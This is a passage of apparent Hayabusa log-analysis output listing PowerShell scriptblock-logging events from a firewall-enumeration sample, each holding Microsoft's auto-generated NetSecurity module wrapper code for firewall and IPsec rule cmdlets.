[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdle",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 
'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 
'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 
'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecRule ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration 
Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetConSecRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] 
[string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 